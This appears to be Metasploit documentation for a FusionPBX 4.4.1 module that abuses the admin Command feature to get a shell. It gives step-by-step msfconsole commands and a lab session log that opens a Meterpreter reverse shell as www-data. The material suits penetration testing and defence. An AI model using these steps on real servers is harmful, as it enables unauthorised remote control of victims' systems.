## Description This module uses administrative functionality available in FusionPBX to gain a shell. The Command section of the application permits users with `exec_view` permissions, or superadmin permissions, to execute arbitrary system commands, or arbitrary PHP code, as the web server user. ## Vulnerable Software This module has been tested successfully on FusionPBX version 4.4.1 on Ubuntu 19.04 (x64). Software: * https://www.fusionpbx.com/download * https://github.com/fusionpbx/fusionpbx/releases ## Verification Steps 1. Start `msfconsole` 2. Do: `use exploit/unix/webapp/fusionpbx_exec_cmd_exec` 3. Do: `set rhosts ` 4. Do: `set username ` (default: `admin`) 5. Do: `set password ` 6. Do: `run` 7. You should get a new session ## Options **TARGETURI** The base path to FusionPBX (default: `/`) **USERNAME** The username for FusionPBX (default: `admin`) **PASSWORD** The password for FusionPBX ## Scenarios ``` msf5 > use exploit/unix/webapp/fusionpbx_exec_cmd_exec msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set rhosts 172.16.191.214 rhosts => 172.16.191.214 msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set username admin username => admin msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set password PXRtwZqSkvToC4gc password => PXRtwZqSkvToC4gc msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > set lhost 172.16.191.165 lhost => 172.16.191.165 msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > show targets Exploit targets: Id Name -- ---- 0 Automatic (PHP In-Memory) 1 Automatic (Unix In-Memory) 2 Automatic (Linux Dropper) msf5 exploit(unix/webapp/fusionpbx_exec_cmd_exec) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [+] Authenticated as user 'admin' [*] Sending payload (1115 bytes) ... [*] Sending stage (38288 bytes) to 172.16.191.214 [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.214:60772) at 2019-11-01 19:25:43 -0400 meterpreter > getuid Server username: www-data (33) meterpreter > ```